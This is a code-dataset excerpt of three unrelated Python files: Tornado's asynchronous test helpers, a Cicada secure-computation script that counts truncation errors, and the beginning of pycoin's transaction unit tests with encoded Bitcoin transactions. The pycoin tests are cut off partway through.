self.__failure = (typ, value, tb)
else:
app_log.error("multiple unhandled exceptions in test",
exc_info=(typ, value, tb))
self.stop()
return True
def __rethrow(self):
if self.__failure is not None:
failure = self.__failure
self.__failure = None
raise_exc_info(failure)
def run(self, result=None):
with ExceptionStackContext(self._handle_exception):
super(AsyncTestCase, self).run(result)
# As a last resort, if an exception escaped super.run() and wasn't
# re-raised in tearDown, raise it here. This will cause the
# unittest run to fail messily, but that's better than silently
# ignoring an error.
self.__rethrow()
def stop(self, _arg=None, **kwargs):
"""Stops the `.IOLoop`, causing one pending (or future) call to `wait()`
to return.
Keyword arguments or a single positional argument passed to `stop()` are
saved and will be returned by `wait()`.
"""
assert _arg is None or not kwargs
self.__stop_args = kwargs or _arg
if self.__running:
self.io_loop.stop()
self.__running = False
self.__stopped = True
def wait(self, condition=None, timeout=None):
"""Runs the `.IOLoop` until stop is called or timeout has passed.
In the event of a timeout, an exception will be thrown. The
default timeout is 5 seconds; it may be overridden with a
``timeout`` keyword argument or globally with the
``ASYNC_TEST_TIMEOUT`` environment variable.
If ``condition`` is not None, the `.IOLoop` will be restarted
after `stop()` until ``condition()`` returns true.
.. versionchanged:: 3.1
Added the ``ASYNC_TEST_TIMEOUT`` environment variable.
"""
if timeout is None:
timeout = get_async_test_timeout()
if not self.__stopped:
if timeout:
def timeout_func():
try:
raise self.failureException(
'Async operation timed out after %s seconds' %
timeout)
except Exception:
self.__failure = sys.exc_info()
self.stop()
self.__timeout = self.io_loop.add_timeout(self.io_loop.time() + timeout, timeout_func)
while True:
self.__running = True
self.io_loop.start()
if (self.__failure is not None or
condition is None or condition()):
break
if self.__timeout is not None:
self.io_loop.remove_timeout(self.__timeout)
self.__timeout = None
assert self.__stopped
self.__stopped = False
self.__rethrow()
result = self.__stop_args
self.__stop_args = None
return result
class AsyncHTTPTestCase(AsyncTestCase):
"""A test case that starts up an HTTP server.
Subclasses must override `get_app()`, which returns the
`tornado.web.Application` (or other `.HTTPServer` callback) to be tested.
Tests will typically use the provided ``self.http_client`` to fetch
URLs from this server.
Example, assuming the "Hello, world" example from the user guide is in
``hello.py``::
import hello
class TestHelloApp(AsyncHTTPTestCase):
def get_app(self):
return hello.make_app()
def test_homepage(self):
response = self.fetch('/')
self.assertEqual(response.code, 200)
self.assertEqual(response.body, 'Hello, world')
That call to ``self.fetch()`` is equivalent to ::
self.http_client.fetch(self.get_url('/'), self.stop)
response = self.wait()
which illustrates how AsyncTestCase can turn an asynchronous operation,
like ``http_client.fetch()``, into a synchronous operation. If you need
to do other asynchronous operations in tests, you'll probably need to use
``stop()`` and ``wait()`` yourself.
"""
def setUp(self):
super(AsyncHTTPTestCase, self).setUp()
sock, port = bind_unused_port()
self.__port = port
self.http_client = self.get_http_client()
self._app = self.get_app()
self.http_server = self.get_http_server()
self.http_server.add_sockets([sock])
def get_http_client(self):
return AsyncHTTPClient(io_loop=self.io_loop)
def get_http_server(self):
return HTTPServer(self._app, io_loop=self.io_loop,
**self.get_httpserver_options())
def get_app(self):
"""Should be overridden by subclasses to return a
`tornado.web.Application` or other `.HTTPServer` callback.
"""
raise NotImplementedError()
def fetch(self, path, **kwargs):
"""Convenience method to synchronously fetch a url.
The given path will be appended to the local server's host and
port. Any additional kwargs will be passed directly to
`.AsyncHTTPClient.fetch` (and so could be used to pass
``method="POST"``, ``body="..."``, etc).
"""
self.http_client.fetch(self.get_url(path), self.stop, **kwargs)
return self.wait()
def get_httpserver_options(self):
"""May be overridden by subclasses to return additional
keyword arguments for the server.
"""
return {}
def get_http_port(self):
"""Returns the port used by the server.
A new port is chosen for each test.
"""
return self.__port
def get_protocol(self):
return 'http'
def get_url(self, path):
"""Returns an absolute url for the given path on the test server."""
return '%s://localhost:%s%s' % (self.get_protocol(),
self.get_http_port(), path)
def tearDown(self):
self.http_server.stop()
self.io_loop.run_sync(self.http_server.close_all_connections,
timeout=get_async_test_timeout())
if (not IOLoop.initialized() or
self.http_client.io_loop is not IOLoop.instance()):
self.http_client.close()
super(AsyncHTTPTestCase, self).tearDown()
class AsyncHTTPSTestCase(AsyncHTTPTestCase):
"""A test case that starts an HTTPS server.
Interface is generally the same as `AsyncHTTPTestCase`.
"""
def get_http_client(self):
return AsyncHTTPClient(io_loop=self.io_loop, force_instance=True,
defaults=dict(validate_cert=False))
def get_httpserver_options(self):
return dict(ssl_options=self.get_ssl_options())
def get_ssl_options(self):
"""May be overridden by subclasses to select SSL options.
By default includes a self-signed testing certificate.
"""
# Testing keys were generated with:
# openssl req -new -keyout tornado/test/test.key -out tornado/test/test.crt -nodes -days 3650 -x509
module_dir = os.path.dirname(__file__)
return dict(
certfile=os.path.join(module_dir, 'test', 'test.crt'),
keyfile=os.path.join(module_dir, 'test', 'test.key'))
def get_protocol(self):
return 'https'
def gen_test(func=None, timeout=None):
"""Testing equivalent of ``@gen.coroutine``, to be applied to test methods.
``@gen.coroutine`` cannot be used on tests because the `.IOLoop` is not
already running. ``@gen_test`` should be applied to test methods
on subclasses of `AsyncTestCase`.
Example::
class MyTest(AsyncHTTPTestCase):
@gen_test
def test_something(self):
response = yield gen.Task(self.fetch('/'))
By default, ``@gen_test`` times out after 5 seconds. The timeout may be
overridden globally with the ``ASYNC_TEST_TIMEOUT`` environment variable,
or for each test with the ``timeout`` keyword argument::
class MyTest(AsyncHTTPTestCase):
@gen_test(timeout=10)
def test_something_slow(self):
response = yield gen.Task(self.fetch('/'))
.. versionadded:: 3.1
The ``timeout`` argument and ``ASYNC_TEST_TIMEOUT`` environment
variable.
.. versionchanged:: 4.0
The wrapper now passes along ``*args, **kwargs`` so it can be used
on functions with arguments.
"""
if timeout is None:
timeout = get_async_test_timeout()
def wrap(f):
# Stack up several decorators to allow us to access the generator
# object itself. In the innermost wrapper, we capture the generator
# and save it in an attribute of self. Next, we run the wrapped
# function through @gen.coroutine. Finally, the coroutine is
# wrapped again to make it synchronous with run_sync.
#
# This is a good case study arguing for either some sort of
# extensibility in the gen decorators or cancellation support.
@functools.wraps(f)
def pre_coroutine(self, *args, **kwargs):
result = f(self, *args, **kwargs)
if isinstance(result, GeneratorType):
self._test_generator = result
else:
self._test_generator = None
return result
coro = gen.coroutine(pre_coroutine)
@functools.wraps(coro)
def post_coroutine(self, *args, **kwargs):
try:
return self.io_loop.run_sync(
functools.partial(coro, self, *args, **kwargs),
timeout=timeout)
except TimeoutError as e:
# run_sync raises an error with an unhelpful traceback.
# If we throw it back into the generator the stack trace
# will be replaced by the point where the test is stopped.
self._test_generator.throw(e)
# In case the test contains an overly broad except clause,
# we may get back here. In this case re-raise the original
# exception, which is better than nothing.
raise
return post_coroutine
if func is not None:
# Used like:
# @gen_test
# def f(self):
# pass
return wrap(func)
else:
# Used like @gen_test(timeout=10)
return wrap
# Without this attribute, nosetests will try to run gen_test as a test
# anywhere it is imported.
gen_test.__test__ = False
class LogTrapTestCase(unittest.TestCase):
"""A test case that captures and discards all logging output
if the test passes.
Some libraries can produce a lot of logging output even when
the test succeeds, so this class can be useful to minimize the noise.
Simply use it as a base class for your test case. It is safe to combine
with AsyncTestCase via multiple inheritance
(``class MyTestCase(AsyncHTTPTestCase, LogTrapTestCase):``)
This class assumes that only one log handler is configured and
that it is a `~logging.StreamHandler`. This is true for both
`logging.basicConfig` and the "pretty logging" configured by
`tornado.options`. It is not compatible with other log buffering
mechanisms, such as those provided by some test runners.
.. deprecated:: 4.1
Use the unittest module's ``--buffer`` option instead, or `.ExpectLog`.
"""
def run(self, result=None):
logger = logging.getLogger()
if not logger.handlers:
logging.basicConfig()
handler = logger.handlers[0]
if (len(logger.handlers) > 1 or
not isinstance(handler, logging.StreamHandler)):
# Logging has been configured in a way we don't recognize,
# so just leave it alone.
super(LogTrapTestCase, self).run(result)
return
old_stream = handler.stream
try:
handler.stream = StringIO()
gen_log.info("RUNNING TEST: " + str(self))
old_error_count = len(result.failures) + len(result.errors)
super(LogTrapTestCase, self).run(result)
new_error_count = len(result.failures) + len(result.errors)
if new_error_count != old_error_count:
old_stream.write(handler.stream.getvalue())
finally:
handler.stream = old_stream
class ExpectLog(logging.Filter):
"""Context manager to capture and suppress expected log output.
Useful to make tests of error conditions less noisy, while still
leaving unexpected log entries visible. *Not thread safe.*
The attribute ``logged_stack`` is set to true if any exception
stack trace was logged.
Usage::
with ExpectLog('tornado.application', "Uncaught exception"):
error_response = self.fetch("/some_page")
.. versionchanged:: 4.3
Added the ``logged_stack`` attribute.
"""
def __init__(self, logger, regex, required=True):
"""Constructs an ExpectLog context manager.
:param logger: Logger object (or name of logger) to watch. Pass
an empty string to watch the root logger.
:param regex: Regular expression to match. Any log entries on
the specified logger that match this regex will be suppressed.
:param required: If true, an exeption will be raised if the end of
the ``with`` statement is reached without matching any log entries.
"""
if isinstance(logger, basestring_type):
logger = logging.getLogger(logger)
self.logger = logger
self.regex = re.compile(regex)
self.required = required
self.matched = False
self.logged_stack = False
def filter(self, record):
if record.exc_info:
self.logged_stack = True
message = record.getMessage()
if self.regex.match(message):
self.matched = True
return False
return True
def __enter__(self):
self.logger.addFilter(self)
return self
def __exit__(self, typ, value, tb):
self.logger.removeFilter(self)
if not typ and self.required and not self.matched:
raise Exception("did not get expected log message")
def main(**kwargs):
"""A simple test runner.
This test runner is essentially equivalent to `unittest.main` from
the standard library, but adds support for tornado-style option
parsing and log formatting.
The easiest way to run a test is via the command line::
python -m tornado.testing tornado.test.stack_context_test
See the standard library unittest module for ways in which tests can
be specified.
Projects with many tests may wish to define a test script like
``tornado/test/runtests.py``. This script should define a method
``all()`` which returns a test suite and then call
`tornado.testing.main()`. Note that even when a test script is
used, the ``all()`` test suite may be overridden by naming a
single test on the command line::
# Runs all tests
python -m tornado.test.runtests
# Runs one test
python -m tornado.test.runtests tornado.test.stack_context_test
Additional keyword arguments passed through to ``unittest.main()``.
For example, use ``tornado.testing.main(verbosity=2)``
to show many test details as they are run.
See http://docs.python.org/library/unittest.html#unittest.main
for full argument list.
"""
from tornado.options import define, options, parse_command_line
define('exception_on_interrupt', type=bool, default=True,
help=("If true (default), ctrl-c raises a KeyboardInterrupt "
"exception. This prints a stack trace but cannot interrupt "
"certain operations. If false, the process is more reliably "
"killed, but does not print a stack trace."))
# support the same options as unittest's command-line interface
define('verbose', type=bool)
define('quiet', type=bool)
define('failfast', type=bool)
define('catch', type=bool)
define('buffer', type=bool)
argv = [sys.argv[0]] + parse_command_line(sys.argv)
if not options.exception_on_interrupt:
signal.signal(signal.SIGINT, signal.SIG_DFL)
if options.verbose is not None:
kwargs['verbosity'] = 2
if options.quiet is not None:
kwargs['verbosity'] = 0
if options.failfast is not None:
kwargs['failfast'] = True
if options.catch is not None:
kwargs['catchbreak'] = True
if options.buffer is not None:
kwargs['buffer'] = True
if __name__ == '__main__' and len(argv) == 1:
print("No tests specified", file=sys.stderr)
sys.exit(1)
try:
# In order to be able to run tests by their fully-qualified name
# on the command line without importing all tests here,
# module must be set to None. Python 3.2's unittest.main ignores
# defaultTest if no module is given (it tries to do its own
# test discovery, which is incompatible with auto2to3), so don't
# set module if we're not asking for a specific test.
if len(argv) > 1:
unittest.main(module=None, argv=argv, **kwargs)
else:
unittest.main(defaultTest="all", argv=argv, **kwargs)
except SystemExit as e:
if e.code == 0:
gen_log.info('PASS')
else:
gen_log.error('FAIL')
raise
if __name__ == '__main__':
main()
| 37.493113 | 107 | 0.637472 |
7738156267e2fb9e5ec1654f36f4f55408e0e63b | 5,679 | py | Python | examples/truncsets.py | cicada-mpc/cicada-mpc | 3b4a1e6b950e90e43e56d9c0f7d11e639f462d81 | [
"Apache-2.0"
] | 5 | 2021-06-30T17:31:56.000Z | 2022-03-21T18:59:57.000Z | examples/truncsets.py | cicada-mpc/cicada-mpc | 3b4a1e6b950e90e43e56d9c0f7d11e639f462d81 | [
"Apache-2.0"
] | 36 | 2021-07-06T16:38:32.000Z | 2022-03-28T03:14:20.000Z | examples/truncsets.py | cicada-mpc/cicada-mpc | 3b4a1e6b950e90e43e56d9c0f7d11e639f462d81 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 National Technology & Engineering Solutions
# of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from statistics import mean, stdev
import logging
import numpy
import cicada.communicator
import cicada.encoder
import cicada.additive
from tqdm import tqdm
import sys
primeDict = {64:2**64-59, 62:2**62-57, 60:2**60-93, 58:2**58-27, 56:72057594037927931, 54:10420223883547487, 48: 149418408868787}
numPrimeBits = 64 #Pick a value from the preceding dictionary
numTruncBits =16
testVal = 2**14
expected = testVal/2**numTruncBits
logend = '.log'
plotend = '.png'
try:
numRuns = int(sys.argv[1])
except:
numRuns = 10000
fnameprefix = 'lotsOtruncs_'+str(numRuns)
batchsize = 1000
batchErrors = {}
logging.basicConfig(level=logging.INFO)
@cicada.communicator.NNGCommunicator.run(world_size=3)
def main(communicator):
log = cicada.Logger(logging.getLogger(), communicator)
#Works pretty reliably with a 54 bit prime, gets unstable in a hurry with bigger than 54 bits, very reliably with 48 bits or smaller
#Suspicions lie with things getting inappropriately cast as Numpy ints again.
# default 64 bit prime: 18446744073709551557 = (2^64)-59
# 56 bit prime: 72057594037927931 = (2^56-5) or 52304857833066023 a safe prime
# 54 bit prime: 10420223883547487
# 48 bit prime: 149418408868787
# 32 bit prime: 4034875883
# small prime: 7919
encoder = cicada.encoder.FixedFieldEncoder(primeDict[numPrimeBits], numTruncBits)
protocol = cicada.additive.AdditiveProtocol(communicator)
errs = []
errDict = {}
maxErr = 0
success = False
numErrs = 0
loopCount = 0
try:
for i in tqdm(range(numRuns), ascii=True):
# if i and (i%batchsize) == 0:
# communicator.barrier()
loopCount = int(i)+1
secret2trunc = protocol.secret(encoder=encoder, src=0, value=numpy.array(testVal))
revealedsecret = protocol.reveal(secret2trunc)
# log.info(f"Player {communicator.rank} revealed: {revealedsecret} expected: {testVal}")
# print('top op: ', secretly32)
secretTruncd,err = protocol.trunc_werr(operand = secret2trunc)
revealedSecretTruncd = protocol.reveal(secretTruncd)
# log.info(f"Player {communicator.rank} revealed: {revealedSecretTruncd} expected: {expected}")
batchID = i//batchsize
if batchID not in batchErrors:
batchErrors[batchID] = 0
if batchID >= 1:
print(f'Errors in batch {batchID}: {batchErrors[batchID-1]}')
if abs(err) > abs(maxErr):
maxErr = err
if err != 0:
numErrs += 1
batchErrors[batchID] += 1
if err in errDict:
errDict[err] += 1
else:
errDict[err] = 1
with open(fnameprefix+logend, 'w') as fout:
# fout.write(f'Errors observed mean: {mean(errs)} stdev: {stdev(errs)}')
# fout.write(f'\n\nMax observed error: {maxErr}')
fout.write(f'\n\nTotal number of error instances: {numErrs}')
fout.write(f'\nNum Successful truncs: {loopCount}\n')
# print(f'Errors observed mean: {mean(errs)} stdev: {stdev(errs)}')
# print(f'Max observed error: {maxErr}')
print(f'Total number of error instances: {numErrs}')
print(f'Num Successful truncs: {loopCount}')
print('########## <batchNum>,<errcount>')
for k,v in batchErrors.items():
print(f'batch num: {k}\t errors: {v}')
fout.write(f'{k},{v}\n')
labels = []
heights = []
for k, v in errDict.items():
fout.write(f'{k},{v}\n')
labels.append(k)
heights.append(v)
# fig = plt.figure()
# ax = fig.add_axes([0,0,1,1,])
# ax.bar(labels, heights)
# plt.savefig(fnameprefix+plotend)
success = True
finally:
if not success:
with open(fnameprefix+logend, 'w') as fout:
# fout.write(f'Errors observed mean: {mean(errs)} stdev: {stdev(errs)}')
# fout.write(f'\nMax observed error: {maxErr}')
fout.write(f'\nTotal number of error instances: {numErrs}')
fout.write(f'\nNum Successful truncs: {loopCount}\n')
print('########## <batchNum>,<errcount>')
for k,v in batchErrors.items():
print(f'batch num: {k}\t errors: {v}')
fout.write(f'{k},{v}\n')
labels = []
heights = []
for k, v in errDict.items():
fout.write(f'{k},{v}\n')
labels.append(k)
heights.append(v)
# fig = plt.figure()
# ax = fig.add_axes([0,0,1,1,])
# ax.bar(labels, heights)
# plt.savefig(fnameprefix+plotend)
main()
| 41.452555 | 136 | 0.598345 |
7e814ae1065867a739b4253287534db4fd3629a7 | 11,801 | py | Python | tests/tx_test.py | GRS-Community/pycoin | 4a9b9722c91e2831519ddf9675fe8c70246432b7 | [
"MIT"
] | 5 | 2017-12-15T13:40:50.000Z | 2021-12-18T13:18:54.000Z | tests/tx_test.py | GRS-Community/pycoin | 4a9b9722c91e2831519ddf9675fe8c70246432b7 | [
"MIT"
] | 1 | 2018-08-06T03:48:14.000Z | 2018-09-03T03:01:03.000Z | tests/tx_test.py | GRS-Community/pycoin | 4a9b9722c91e2831519ddf9675fe8c70246432b7 | [
"MIT"
] | 6 | 2018-08-24T18:49:47.000Z | 2021-01-19T10:04:08.000Z | import binascii
import unittest
from pycoin.serialize import b2h, h2b_rev
from pycoin.tx.Tx import Tx
TX_E1A18B843FC420734DEEB68FF6DF041A2585E1A0D7DBF3B82AAB98291A6D9952_HEX = (
"0100000001a8f57056b016d7d243fc0fc2a73f9146e7e4c7766ec6033b5ac4cb89c64e"
"19d0000000008a4730440220251acb534ba1b8a269260ad3fa80e075cd150d3ffba76a"
"d20cd2e8178dee98b702202284f9c7eae3adfcf0857a901cd34f0ea338d5744caab88a"
"fad5797be643f7b7014104af8385da9dc85aa153f16341a4015bc95e7ff57876b9bde4"
"0bd8450a5723a05c1c89ff2d85230d2e62c0c7690b8272cf85868a0a0fc02f99a5b793"
"f22d5c7092ffffffff02bb5b0700000000001976a9145b78716d137e386ae2befc4296"
"d938372559f37888acdd3c71000000000017a914c6572ee1c85a1b9ce1921753871bda"
"0b5ce889ac8700000000")
class TxTest(unittest.TestCase):
def test_tx_api(self):
tx = Tx.from_hex(TX_E1A18B843FC420734DEEB68FF6DF041A2585E1A0D7DBF3B82AAB98291A6D9952_HEX)
# this transaction is a pay-to-hash transaction
self.assertEqual(tx.id(), "e1a18b843fc420734deeb68ff6df041a2585e1a0d7dbf3b82aab98291a6d9952")
self.assertEqual(tx.txs_out[0].bitcoin_address(), "19LemzJ3XPdUxp113uynqCAivDbXZBdBy3")
self.assertEqual(tx.txs_out[1].bitcoin_address(), "3KmkA7hvqG2wKkWUGz1BySioUywvcmdPLR")
def test_blanked_hash(self):
tx = Tx.from_hex(TX_E1A18B843FC420734DEEB68FF6DF041A2585E1A0D7DBF3B82AAB98291A6D9952_HEX)
self.assertEqual(tx.id(), "e1a18b843fc420734deeb68ff6df041a2585e1a0d7dbf3b82aab98291a6d9952")
self.assertEqual(
b2h(tx.blanked_hash()), "909579526c4c2c441687c7478d3f96249724d2ff071d2272b44500d6cf70d5d6")
tx.txs_in[0].script = b"foo"
self.assertEqual(
b2h(tx.blanked_hash()), "909579526c4c2c441687c7478d3f96249724d2ff071d2272b44500d6cf70d5d6")
tx.txs_out[0].coin_value += 1
self.assertEqual(
b2h(tx.blanked_hash()), "10d4e87f7bf35f2949e7693e7a4a84189aad8631f0b2b0999e88f7261066cbe5")
tx.txs_in[0].script = b"bar"
self.assertEqual(
b2h(tx.blanked_hash()), "10d4e87f7bf35f2949e7693e7a4a84189aad8631f0b2b0999e88f7261066cbe5")
tx.txs_in[0].script = b""
self.assertEqual(b2h(tx.hash()), "10d4e87f7bf35f2949e7693e7a4a84189aad8631f0b2b0999e88f7261066cbe5")
tx.txs_in[0].script = b"foo"
self.assertEqual(b2h(tx.hash()), "c91910058722f1c0f52fc5c734939053c9b87882a9c72b609f21632e0bd13751")
def test_issue_39(self):
"""
See https://github.com/richardkiss/pycoin/issues/39 and
https://github.com/richardkiss/pycoin/pull/40
There was a problem validating the following transactions:
315ac7d4c26d69668129cc352851d9389b4a6868f1509c6c8b66bead11e2619f
dbf38261224ebff0c455c405e2435cfc69adb6b8a42d7b10674d9a4eb0464dca
de744408e4198c0a39310c8106d1830206e8d8a5392bcf715c9b5ec97d784edd
This codes tests this.
"""
TX_B64_LIST = [
# some encoded transactions (the three listed above and the three
# that they depend upon)
(
"AQAAAALcOOk1m9faO1g4YgThhtlAhoX0J/XlE2ZttzWqimshaQAAAABqRzBE"
"AiBdj+6zEkeORo0LUU5j4ROVjXIU+lcqzYcHmn8MwCb8XAIgD6duoFvyQ69t"
"D5F38kHK9gbQH8/V5i1r77yiTlaeXCcDIQIQChqcosGJMtZXfFjyJVgBhNDg"
"gibUGVmHSslj48Gy/v/////cOOk1m9faO1g4YgThhtlAhoX0J/XlE2ZttzWq"
"imshaQEAAABrSDBFAiAIft44cp5tNeT1FVBQGOZZIiAxJztzZpIPOT7jqxe8"
"HgIhAMpDFkt1fRptEjXxMgDUtfdt2P2k7J/ChUay31sSEejfAyECdZg5E+YA"
"k7dn6FWXypOX+y9Bjlf5mNavu8U2EWCFscv/////AUCJlQAAAAAAGXapFPzJ"
"s204z1XX1bTuTd22ssF2EvSMiKwAAAAA"
),
(
"AQAAAAEtUf3HWib/PGE4Ag4am7QPH6tuOc6W/q4yGMmuA14AqwEAAABrSDBF"
"AiEA5PGlIZB+UPxE0zEy7pjJcVpk350sKGDj4EdMUhq4U34CIDCvjTUGpTUu"
"KwVkRazYVaQtNycOlKYpp7KLIYcOxtdhASEDgIxJPwYZkNK+AB5A8EiuiHAy"
"C3SJXOLZZS88HHPNbyz/////AvCHSwAAAAAAGXapFPzJs204z1XX1bTuTd22"
"ssF2EvSMiKzwh0sAAAAAABl2qRQzzvYXSdEboq3wkaXgRWeBd/46bYisAAAA"
"AA=="
),
(
"AQAAAAJa+fLO2OCiRk98qhSvobvRyPsY3qrl0QEZa1jcIn70rgAAAABqRzBE"
"AiANKFITbLHEu93eBOx29YHRsyockZFIyF+8D9BWXTWK8wIgNvKqF87Ind6w"
"A3aigYv3KMRHmSgLnyBExWkad7Dc2WwDIQIQChqcosGJMtZXfFjyJVgBhNDg"
"gibUGVmHSslj48Gy/v////9a+fLO2OCiRk98qhSvobvRyPsY3qrl0QEZa1jc"
"In70rgEAAABrSDBFAiEA9APIYMTjztPlIyyzWCXnk3It+vCsLwGWGpN4K0kG"
"qWMCIGLdifJz5mvPrW8FqLDNJrp7Bma+/Qw9pF2feVcX2lBKAyECdZg5E+YA"
"k7dn6FWXypOX+y9Bjlf5mNavu8U2EWCFscv/////AaAClAAAAAAAGXapFOUK"
"XY2jOZUbBAutBFPXxAz9dNPciKwAAAAA"
),
(
"AQAAAAGfYeIRrb5mi2ycUPFoaEqbONlRKDXMKYFmaW3C1MdaMQAAAABsSTBG"
"AiEAhIisrGQ/6Sa7DAJtv+pa9nMiHuBTLNAkxlyzDjYvGEQCIQCFH27K+zjJ"
"ItZHnrCORpOhrBnHvPnUX8mqXy1pGB/4ngEhAhAKGpyiwYky1ld8WPIlWAGE"
"0OCCJtQZWYdKyWPjwbL+/////wKgxEoAAAAAABl2qRT8ybNtOM9V19W07k3d"
"trLBdhL0jIisoMRKAAAAAAAZdqkUM872F0nRG6Kt8JGl4EVngXf+Om2IrAAA"
"AAA="
),
(
"AQAAAALCBkSoNGHOnUgtcCy8I87ODdMmW1WL56GNNOIWvaccAAAAAABrSDBF"
"AiAxKffbGKLs4sDhPFwLZvQlHX+Q20uxr0hFzQqtnSQZQAIhAImY0R1z7HrT"
"Tt4hR0R/3n3eS8LXk14G94/O8Pc7LDlmAyECE2UQ39BTBuo0mCvz395yuOSd"
"QyqYBb9kUtOZTnkvnRn/////yRF9O6xy+bn8PWf3KNM1uywKHCYWOL0bgEe1"
"Zd1jGaIAAAAAakcwRAIgRQ7h/BpT6uurhfpEmEE/Xx5OAZdUohj+Euzr3Zg8"
"mbkCIDxIakZ02TMLAtt5OHKyy0VQw7uywxjyis6540zeNZdJAyED78tvrsro"
"6386Jta3YJd/I64guTuYS8oof9K4PDGZeHD/////AeD9HAAAAAAAGXapFB0x"
"6lo758/yr1vtc3EOtvXV9n1wiKwAAAAA"
),
(
"AQAAAAKerCh2TFeXmFaXU1qdQUucoCL5WRFVNZdvNt1FZgp5XQAAAACMSTBG"
"AiEAvLz97Qz/zSlKSDrllLRwj73G2B7RfaiR1ZspOG5Ae3kCIQD5ATZgiNvH"
"X8Tn8Ib8RohgW0HGbPRi00XUcvxCTmybGgFBBCsXId9LDBz91gENMCmVXxRE"
"ZI+E6QOSkToVTtny7tiOJhmHy/jci4KzQmucvUBotsK5r4CiwjhjOkAAXRD6"
"SWD/////6864dM1/4fxjvltUc0HJ1da9agsSw4LV3KYhGR7FJ+MBAAAAi0gw"
"RQIhAJIopjUy7dPOHa+LGTvgM4jfZ8pA522/Jx3+uFC4Lz5IAiBzLNoxejaa"
"dw1CXwOUuzI4rMl0xsuYC5XQaxZNT2TFzwFBBBPpriULEjb9VdVoC8v3E4is"
"RMmfQByPCJYadSwK/ZZg9TTFGyDXUwW+dQ9tScDzhMWfdLK9DyV4iAbnYh/S"
"2cr/////A0BCDwAAAAAAGXapFFzGycfh13x6rrUPhNJNj2ViE7xbiKwACT0A"
"AAAAABl2qRQhQVEH8cwnc3//rGPcfvakBANJxIistBcsAAAAAAAZdqkUMQV+"
"QpfDgBAsCQ+ixaUK5Kgl0kOIrAAAAAA="
),
(
"AQAAAAO1CFlm1mEB3fjCtilQEH+6TbR3UzdJyqafj3mab9Mc6gAAAACKRzBE"
"AiA8rWZ4BB8YYJp3xtx8jAZdrfQ6B0zjYRdgTS7I5LZF7gIgabCjn9iu9L3n"
"YvKrdXFJJygtbg6V8iMTLrPh8ghdGvwBQQQrFyHfSwwc/dYBDTAplV8URGSP"
"hOkDkpE6FU7Z8u7YjiYZh8v43IuCs0JrnL1AaLbCua+AosI4YzpAAF0Q+klg"
"/////8IGRKg0Yc6dSC1wLLwjzs4N0yZbVYvnoY004ha9pxwAAQAAAItIMEUC"
"IDNZYWLuCV0nJL6CCGgUfQfNoh0oAACd2lMZn+zJdJCDAiEAqZafa18G1K1x"
"/6yOvj8h1uAGSM8UjSJJ6479li5sos4BQQTswrqYR5m+x0vFTzgGrrM2k+Gx"
"gX+hDBAvN8Kq9RRuWdqC4jVNGhGdFD63Ev1TQYXMqvp6b9ztbAZ3ED8i6sFo"
"/////0Vf19DzvUs2DvFwlVW9viTF+YlXCNYNMD6yUXK9I9RBAgAAAItIMEUC"
"IQCKbaQY2eH1fsXZFksstrP4B+uxPBwGRe2Wxl7rW5sYGwIgVvVEPdnJNvVj"
"rh0XZdhqnOAA0Sw39Upqkejrm+yXWnwBQQQ1hDJBuzoTc1ZJ8zyVQjEfRcjW"
"o8rq3lE+3x3rYZ3Q/9xBEBtsnkFAzps/N8n6C5cK2QAmRGxeGFmbYaGFT5RP"
"/////wNAQg8AAAAAABl2qRSU70Qwi2d2bI+nKnCP19XGsbSnWoisVEkwAAAA"
"AAAZdqkUgroT7ai54LzKPXVnWJsPoV6lJ0yIrHjrFQAAAAAAGXapFEFyZV9I"
"izJXnWmTivO2n9OKDWCdiKwAAAAA"
),
(
"AQAAAAHBHumhtHyFj2ma501AFchO/RrrfkY1sYTKsJiYe6i5pAEAAADaAEcw"
"RAIgJQsMj5xe4yyGSQOseNBu7zuQNbdwYRpmu4tyOeVrDhoCIHTRJ5lHr5OH"
"JsmDYl4nTEMhT2TeEN8tMNtrt/rFLMaHAUgwRQIhAObKZ2o5NubR2aoXKP7q"
"oNMI3sv4u33Hnxcu1NBCilhoAiAH5OaEGAC5snVQDIWgXXVWICosFmTHHjXg"
"y5fNwAO5gAFHUiECzr9qtYCUjRRrfMdx2OZGl0NJ09exHz4DKH0Jl6R307kh"
"A3umUUhbeiyyIhketkpVkm5iu6v+m17SqUiKrVR7IEKCUq7/////An1KDwAA"
"AAAAGXapFNxnIa33YyARGtMFwzhMdn1LmeGViKxllyYPAAAAABepFNsSg3N8"
"2T68HrEpjWRKeEbFWm2WhwAAAAA="
),
(
"AQAAAAHZI2Rm7Gvz7UMEKi20P7AIT5AOxlhwW29S0uFz9EPz1QEAAADaAEgw"
"RQIhAIX1NZuYzrKUHFAxUNYI6yWMUuzCEapuZOUY6TdCspWaAiAchzgPP6if"
"WNh0cmVkyW1UpygM/eVa1XrtHepCMhvArAFHMEQCIGLJtKtbyJEaH6iQS+hK"
"xUlGrWwmqdJScz/JfSZ1Qln6AiBNRC+gswEEMjTNR5uVetqCGJkNL2m6fDfk"
"DyICU/otoQFHUiECzr9qtYCUjRRrfMdx2OZGl0NJ09exHz4DKH0Jl6R307kh"
"A3umUUhbeiyyIhketkpVkm5iu6v+m17SqUiKrVR7IEKCUq7/////Aux5CAAA"
"AAAAGXapFDIKbLrYWAn/2ZTB7ToisbIaZ5DoiKzL5TUPAAAAABepFNsSg3N8"
"2T68HrEpjWRKeEbFWm2WhwAAAAA="
),
( # 837dea37ddc8b1e3ce646f1a656e79bbd8cc7f558ac56a169626d649ebe2a3ba
"AQAAAAGsp/O0VlTCMOCIalf7mIwwRO9ej385cm0wXGHV6BiQPAAAAAD9XQEAS"
"DBFAiABh6+Sjp0VXEsaycHJEYFTI5q6dndPd118H5w+EG/zPAIhAIgisPZY7e"
"wiJ00LauneEOvy2gaxu9qrpOUOsHjznj14AUcwRAIgeV8PT1lBp3rgMuy54zd"
"TeI1+tcsMeNgFV11rAKHZv+0CID4fStkzLRQWrgHicDjpRbydtZxzJyijg6bx"
"7S+5naekAUzJUkEEkbuiUQkSpb032h+1sWcwEOQ9LG2BLFFOkb+p8usSnhwYM"
